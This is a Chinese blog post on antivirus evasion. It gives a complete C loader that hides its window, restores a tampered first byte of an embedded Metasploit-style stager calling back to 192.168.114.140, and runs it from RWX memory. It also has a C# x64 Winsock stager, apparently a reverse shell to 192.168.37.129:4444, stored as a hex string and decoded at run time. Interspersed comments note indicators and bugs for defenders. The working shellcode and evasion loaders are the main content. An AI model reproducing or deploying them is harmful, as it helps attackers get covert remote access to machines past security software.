免杀 TIPS

地球胖头鱼 2021-01-07
Web安全 发布于 2021-01-07 16:23:12 阅读 337 评论 0

最近在网上看文章,发现很多人在护网或渗透测试过程中没有一个好用的 Tips 就很尴尬。我这里找了几个稍微有点老的 Tips,只是抛砖引玉——因为本身都是一些老方法,作用大不大还是要看用在什么地方。原理是把 shellcode 开头的几个字节改掉(下面第一个例子只改了第一个字节,把 0xfc 存成 0xfe),加载前再写回原值,以绕过针对 shellcode 固定开头字节的静态特征匹配;运行时的行为(申请可读写可执行内存、拷贝、跳转执行)并没有改变。废话不多说了直接上代码。

第一个

#include "windows.h"

int main(int argc,char * argv[]) {

  // Hide the console window so nothing is visible to the logged-on user.
  ::ShowWindow(::GetConsoleWindow(),SW_HIDE);

  // Embedded stager, stored with its first byte changed from 0xFC ("cld",
  // the usual first instruction of a Metasploit-style stager) to 0xFE so the
  // static blob no longer matches a signature on that prologue. The byte is
  // patched back right before execution (see the one-byte memcpy below);
  // left unpatched the blob would not run as intended.
  // Defender note: the tail of the blob contains the ASCII string
  // "192.168.114.140" in clear text, i.e. the callback address is
  // hard-coded in the binary and is a ready-made IOC.
  unsigned char shellcode[]=  "\xfe\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
    "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
    "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
    "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
    "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
    "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
    "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
    "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
    "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
    "\x8d\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c"
    "\x77\x26\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\x68\x3a\x56"
    "\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53\x68\xb3\x15\x00\x00"
    "\xe8\x6a\x01\x00\x00\x2f\x57\x65\x56\x69\x48\x48\x4e\x41\x6f"
    "\x4f\x51\x36\x76\x54\x75\x38\x59\x37\x52\x73\x4d\x41\x38\x68"
    "\x72\x6a\x33\x30\x67\x39\x42\x41\x6c\x42\x35\x66\x45\x68\x33"
    "\x66\x2d\x65\x68\x69\x6e\x46\x42\x33\x45\x4d\x59\x59\x79\x7a"
    "\x46\x34\x53\x34\x6c\x50\x74\x4f\x57\x6a\x4e\x63\x46\x6b\x6f"
    "\x73\x47\x6e\x70\x53\x50\x53\x6e\x33\x64\x73\x53\x7a\x6e\x2d"
    "\x41\x2d\x50\x56\x39\x74\x2d\x6f\x58\x4f\x56\x45\x30\x47\x55"
    "\x61\x63\x34\x61\x41\x68\x42\x53\x67\x57\x58\x69\x6c\x71\x52"
    "\x33\x6b\x6b\x59\x59\x56\x63\x42\x4d\x37\x75\x79\x4f\x70\x38"
    "\x45\x5f\x4d\x70\x44\x30\x35\x39\x4b\x4b\x6b\x4b\x49\x6c\x6a"
    "\x48\x51\x50\x2d\x4d\x32\x75\x64\x4e\x58\x47\x63\x51\x35\x5a"
    "\x4b\x49\x41\x42\x43\x59\x6f\x55\x72\x53\x77\x34\x4e\x59\x35"
    "\x48\x46\x41\x49\x78\x63\x63\x41\x69\x73\x6c\x43\x4c\x44\x76"
    "\x57\x5f\x77\x64\x32\x67\x39\x68\x4d\x51\x54\x31\x39\x50\x50"
    "\x50\x53\x41\x41\x4f\x51\x55\x6b\x68\x4e\x63\x56\x46\x7a\x2d"
    "\x4c\x4a\x47\x38\x52\x58\x38\x61\x6f\x4c\x6b\x2d\x4b\x34\x77"
    "\x46\x48\x72\x00\x50\x68\x57\x89\x9f\xc6\xff\xd5\x89\xc6\x53"
    "\x68\x00\x02\x60\x84\x53\x53\x53\x57\x53\x56\x68\xeb\x55\x2e"
    "\x3b\xff\xd5\x96\x6a\x0a\x5f\x53\x53\x53\x53\x56\x68\x2d\x06"
    "\x18\x7b\xff\xd5\x85\xc0\x75\x14\x68\x88\x13\x00\x00\x68\x44"
    "\xf0\x35\xe0\xff\xd5\x4f\x75\xe1\xe8\x4c\x00\x00\x00\x6a\x40"
    "\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68\x58\xa4\x53"
    "\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53"
    "\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcf\x8b\x07\x01"
    "\xc3\x85\xc0\x75\xe5\x58\xc3\x5f\xe8\x7f\xff\xff\xff\x31\x39"
    "\x32\x2e\x31\x36\x38\x2e\x31\x31\x34\x2e\x31\x34\x30\x00\xbb"
    "\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

  // The original first byte (0xFC), written back over shellcode[0] at run
  // time. The identifier is a typo for "first" and is kept as-is.
  char fisrt[] = "\xfc";
  // One RWX allocation the size of the blob (sizeof includes the string
  // literal's trailing NUL, which is copied along harmlessly). The return
  // value is never checked: on a NULL return the memcpy below writes to
  // address 0. A PAGE_EXECUTE_READWRITE region followed by a copy and an
  // indirect call is itself a textbook loader pattern that behavioural
  // detection keys on; this "tip" only alters the static bytes.
  void *exec = VirtualAlloc(0,sizeof shellcode,MEM_COMMIT,PAGE_EXECUTE_READWRITE);

  // Restore the prologue byte, then stage the blob into executable memory.
  // memcpy is relied on coming in through windows.h; add <string.h> if a
  // different toolchain complains.
  memcpy(shellcode,fisrt,1);
  memcpy(exec, shellcode, sizeof shellcode);

  // Jump into the blob. Its trailing bytes load 0x56a2b5f0 and call through
  // the resolver, which in Metasploit-style stagers is the exit stub, so
  // control most likely never comes back here — confirm by disassembly.
  ((void(*)())exec)();

  return 0;
}

第二个

继上一个之后,第二个tips:

常见的 C# 形式的 shellcode(字节数组)如下:

// x64 stager stored verbatim as a byte array. Defender notes: the run
// 0x77 0x73 0x32 0x5f 0x33 0x32 0x00 0x00 is ASCII "ws2_32", so this is a
// Winsock-based stager; the eight bytes 0x02 0x00 0x11 0x5c 0xc0 0xa8 0x25
// 0x81 look like an inline sockaddr_in (AF_INET, port 0x115c = 4444,
// 192.168.37.129) — confirm by disassembly. Stored this way, the bytes and
// therefore these indicators sit in the binary unchanged; the string form
// further down only changes how the same bytes are stored.
byte[] X_Final = new byte[] { 0xfc ,0x48 ,0x83 ,0xe4 ,0xf0 ,0xe8 ,0xcc ,0x00 ,0x00 ,0x00 ,0x41 ,0x51 ,0x41 , 0x50 ,0x52 ,0x51 ,0x56 ,0x48 ,0x31 ,0xd2 ,0x65 ,0x48 ,0x8b ,0x52 ,0x60 ,0x48 ,0x8b ,0x52 ,0x18 ,0x48 ,0x8b , 0x52 ,0x20 ,0x48 ,0x8b ,0x72 ,0x50 ,0x48 ,0x0f ,0xb7 ,0x4a ,0x4a ,0x4d ,0x31 ,0xc9 ,0x48 ,0x31 ,0xc0 ,0xac , 0x3c ,0x61 ,0x7c ,0x02 ,0x2c ,0x20 ,0x41 ,0xc1 ,0xc9 ,0x0d ,0x41 ,0x01 ,0xc1 ,0xe2 ,0xed ,0x52 ,0x41 ,0x51 , 0x48 ,0x8b ,0x52 ,0x20 ,0x8b ,0x42 ,0x3c ,0x48 ,0x01 ,0xd0 ,0x66 ,0x81 ,0x78 ,0x18 ,0x0b ,0x02 ,0x0f ,0x85 , 0x72 ,0x00 ,0x00 ,0x00 ,0x8b ,0x80 ,0x88 ,0x00 ,0x00 ,0x00 ,0x48 ,0x85 ,0xc0 ,0x74 ,0x67 ,0x48 ,0x01 ,0xd0 , 0x50 ,0x8b ,0x48 ,0x18 ,0x44 ,0x8b ,0x40 ,0x20 ,0x49 ,0x01 ,0xd0 ,0xe3 ,0x56 ,0x48 ,0xff ,0xc9 ,0x41 ,0x8b , 0x34 ,0x88 ,0x48 ,0x01 ,0xd6 ,0x4d ,0x31 ,0xc9 ,0x48 ,0x31 ,0xc0 ,0xac ,0x41 ,0xc1 ,0xc9 ,0x0d ,0x41 ,0x01 , 0xc1 ,0x38 ,0xe0 ,0x75 ,0xf1 ,0x4c ,0x03 ,0x4c ,0x24 ,0x08 ,0x45 ,0x39 ,0xd1 ,0x75 ,0xd8 ,0x58 ,0x44 ,0x8b , 0x40 ,0x24 ,0x49 ,0x01 ,0xd0 ,0x66 ,0x41 ,0x8b ,0x0c ,0x48 ,0x44 ,0x8b ,0x40 ,0x1c ,0x49 ,0x01 ,0xd0 ,0x41 , 0x8b ,0x04 ,0x88 ,0x48 ,0x01 ,0xd0 ,0x41 ,0x58 ,0x41 ,0x58 ,0x5e ,0x59 ,0x5a ,0x41 ,0x58 ,0x41 ,0x59 ,0x41 , 0x5a ,0x48 ,0x83 ,0xec ,0x20 ,0x41 ,0x52 ,0xff ,0xe0 ,0x58 ,0x41 ,0x59 ,0x5a ,0x48 ,0x8b ,0x12 ,0xe9 ,0x4b , 0xff ,0xff ,0xff ,0x5d ,0x49 ,0xbe ,0x77 ,0x73 ,0x32 ,0x5f ,0x33 ,0x32 ,0x00 ,0x00 ,0x41 ,0x56 ,0x49 ,0x89 , 0xe6 ,0x48 ,0x81 ,0xec ,0xa0 ,0x01 ,0x00 ,0x00 ,0x49 ,0x89 ,0xe5 ,0x49 ,0xbc ,0x02 ,0x00 ,0x11 ,0x5c ,0xc0 , 0xa8 ,0x25 ,0x81 ,0x41 ,0x54 ,0x49 ,0x89 ,0xe4 ,0x4c ,0x89 ,0xf1 ,0x41 ,0xba ,0x4c ,0x77 ,0x26 ,0x07 ,0xff , 0xd5 ,0x4c ,0x89 ,0xea ,0x68 ,0x01 ,0x01 ,0x00 ,0x00 ,0x59 ,0x41 ,0xba ,0x29 ,0x80 ,0x6b ,0x00 ,0xff ,0xd5 , 0x6a ,0x05 ,0x41 ,0x5e ,0x50 ,0x50 ,0x4d ,0x31 ,0xc9 ,0x4d ,0x31 ,0xc0 ,0x48 ,0xff ,0xc0 ,0x48 ,0x89 ,0xc2 , 0x48 ,0xff ,0xc0 ,0x48 ,0x89 ,0xc1 ,0x41 ,0xba ,0xea ,0x0f ,0xdf ,0xe0 ,0xff ,0xd5 ,0x48 ,0x89 ,0xc7 ,0x6a , 0x10 ,0x41 ,0x58 ,0x4c ,0x89 ,0xe2 
,0x48 ,0x89 ,0xf9 ,0x41 ,0xba ,0x99 ,0xa5 ,0x74 ,0x61 ,0xff ,0xd5 ,0x85 , 0xc0 ,0x74 ,0x0a ,0x49 ,0xff ,0xce ,0x75 ,0xe5 ,0xe8 ,0x93 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xec ,0x10 ,0x48 , 0x89 ,0xe2 ,0x4d ,0x31 ,0xc9 ,0x6a ,0x04 ,0x41 ,0x58 ,0x48 ,0x89 ,0xf9 ,0x41 ,0xba ,0x02 ,0xd9 ,0xc8 ,0x5f , 0xff ,0xd5 ,0x83 ,0xf8 ,0x00 ,0x7e ,0x55 ,0x48 ,0x83 ,0xc4 ,0x20 ,0x5e ,0x89 ,0xf6 ,0x6a ,0x40 ,0x41 ,0x59 , 0x68 ,0x00 ,0x10 ,0x00 ,0x00 ,0x41 ,0x58 ,0x48 ,0x89 ,0xf2 ,0x48 ,0x31 ,0xc9 ,0x41 ,0xba ,0x58 ,0xa4 ,0x53 , 0xe5 ,0xff ,0xd5 ,0x48 ,0x89 ,0xc3 ,0x49 ,0x89 ,0xc7 ,0x4d ,0x31 ,0xc9 ,0x49 ,0x89 ,0xf0 ,0x48 ,0x89 ,0xda , 0x48 ,0x89 ,0xf9 ,0x41 ,0xba ,0x02 ,0xd9 ,0xc8 ,0x5f ,0xff ,0xd5 ,0x83 ,0xf8 ,0x00 ,0x7d ,0x28 ,0x58 ,0x41 , 0x57 ,0x59 ,0x68 ,0x00 ,0x40 ,0x00 ,0x00 ,0x41 ,0x58 ,0x6a ,0x00 ,0x5a ,0x41 ,0xba ,0x0b ,0x2f ,0x0f ,0x30 , 0xff ,0xd5 ,0x57 ,0x59 ,0x41 ,0xba ,0x75 ,0x6e ,0x4d ,0x61 ,0xff ,0xd5 ,0x49 ,0xff ,0xce ,0xe9 ,0x3c ,0xff , 0xff ,0xff ,0x48 ,0x01 ,0xc3 ,0x48 ,0x29 ,0xc6 ,0x48 ,0x85 ,0xf6 ,0x75 ,0xb4 ,0x41 ,0xff ,0xe7 ,0x58 ,0x6a , 0x00 ,0x59 ,0x49 ,0xc7 ,0xc2 ,0xf0 ,0xb5 ,0xa2 ,0x56 ,0xff ,0xd5 }; 

将其转换为String

  // The same bytes as X_Final, as one comma-separated hex string that is
  // decoded at run time (so the raw byte array is not present in the
  // binary; the decoded bytes are, once the loop below has run).
  // NOTE(review): several elements carry a trailing space before the comma
  // ("50 ,48", "3c ,48", "20 ,49", ...). If those spaces are really in the
  // literal and not a line-wrap artefact of the post, Convert.ToByte(s, 16)
  // is expected to reject "50 " (trailing non-hex character) and the decode
  // loop will throw FormatException — strip whitespace before parsing, or
  // remove the spaces from the string.
  string payload = "fc,48,83,e4,f0,e8,cc,00,00,00,41,51,41,50,52,51,56,48,31,d2,65,48,8b,52,60,48,8b,52,18,48,8b,52,20,48,8b,72,50 ,48,0f,b7,4a,4a,4d,31,c9,48,31,c0,ac,3c,61,7c,02,2c,20,41,c1,c9,0d,41,01,c1,e2,ed,52,41,51,48,8b,52,20,8b,42,3c ,48,01,d0,66,81,78,18,0b,02,0f,85,72,00,00,00,8b,80,88,00,00,00,48,85,c0,74,67,48,01,d0,50,8b,48,18,44,8b,40,20 ,49,01,d0,e3,56,48,ff,c9,41,8b,34,88,48,01,d6,4d,31,c9,48,31,c0,ac,41,c1,c9,0d,41,01,c1,38,e0,75,f1,4c,03,4c,24 ,08,45,39,d1,75,d8,58,44,8b,40,24,49,01,d0,66,41,8b,0c,48,44,8b,40,1c,49,01,d0,41,8b,04,88,48,01,d0,41,58,41,58 ,5e,59,5a,41,58,41,59,41,5a,48,83,ec,20,41,52,ff,e0,58,41,59,5a,48,8b,12,e9,4b,ff,ff,ff,5d,49,be,77,73,32,5f,33 ,32,00,00,41,56,49,89,e6,48,81,ec,a0,01,00,00,49,89,e5,49,bc,02,00,11,5c,c0,a8,25,81,41,54,49,89,e4,4c,89,f1,41 ,ba,4c,77,26,07,ff,d5,4c,89,ea,68,01,01,00,00,59,41,ba,29,80,6b,00,ff,d5,6a,05,41,5e,50,50,4d,31,c9,4d,31,c0,48 ,ff,c0,48,89,c2,48,ff,c0,48,89,c1,41,ba,ea,0f,df,e0,ff,d5,48,89,c7,6a,10,41,58,4c,89,e2,48,89,f9,41,ba,99,a5,74 ,61,ff,d5,85,c0,74,0a,49,ff,ce,75,e5,e8,93,00,00,00,48,83,ec,10,48,89,e2,4d,31,c9,6a,04,41,58,48,89,f9,41,ba,02 ,d9,c8,5f,ff,d5,83,f8,00,7e,55,48,83,c4,20,5e,89,f6,6a,40,41,59,68,00,10,00,00,41,58,48,89,f2,48,31,c9,41,ba,58 ,a4,53,e5,ff,d5,48,89,c3,49,89,c7,4d,31,c9,49,89,f0,48,89,da,48,89,f9,41,ba,02,d9,c8,5f,ff,d5,83,f8,00,7d,28,58 ,41,57,59,68,00,40,00,00,41,58,6a,00,5a,41,ba,0b,2f,0f,30,ff,d5,57,59,41,ba,75,6e,4d,61,ff,d5,49,ff,ce,e9,3c,ff ,ff,ff,48,01,c3,48,29,c6,48,85,f6,75,b4,41,ff,e7,58,6a,00,59,49,c7,c2,f0,b5,a2,56,ff,d5";

然后加载:

// Decode the comma-separated hex string back into the byte array the loader
// consumes. Each element must be exactly one hex pair: Convert.ToByte(s, 16)
// throws FormatException on any other character (including a stray space)
// and OverflowException on a value above 0xff; neither is handled here, and
// an empty trailing element (string ending in ',') would also throw.
string[] Xpayload = payload.Split(','); 
    byte[] X_Final = new byte[Xpayload.Length];            
    for (int i = 0; i < Xpayload.Length; i++){               
         X_Final[i] = Convert.ToByte(Xpayload[i], 16);            
  }   

其他的自行补充即可。需要说明的是,这些做法只能过一些基于静态特征的简单查杀:第一个例子只改了 shellcode 的第一个字节,第二个例子只是把同样的字节换成字符串存放、运行时再解码回来;两个例子在运行时都还是"申请 RWX 内存 + 拷贝 + 调用"的典型加载模式,基于行为的检测并不受影响,而且 shellcode 里硬编码的回连地址仍然以明文或可直接解码的形式留在二进制里。国外的一些产品未测,有兴趣的可以去试试。有什么错误请大家指正。

本作品采用《CC 协议》,转载必须注明作者和本文链接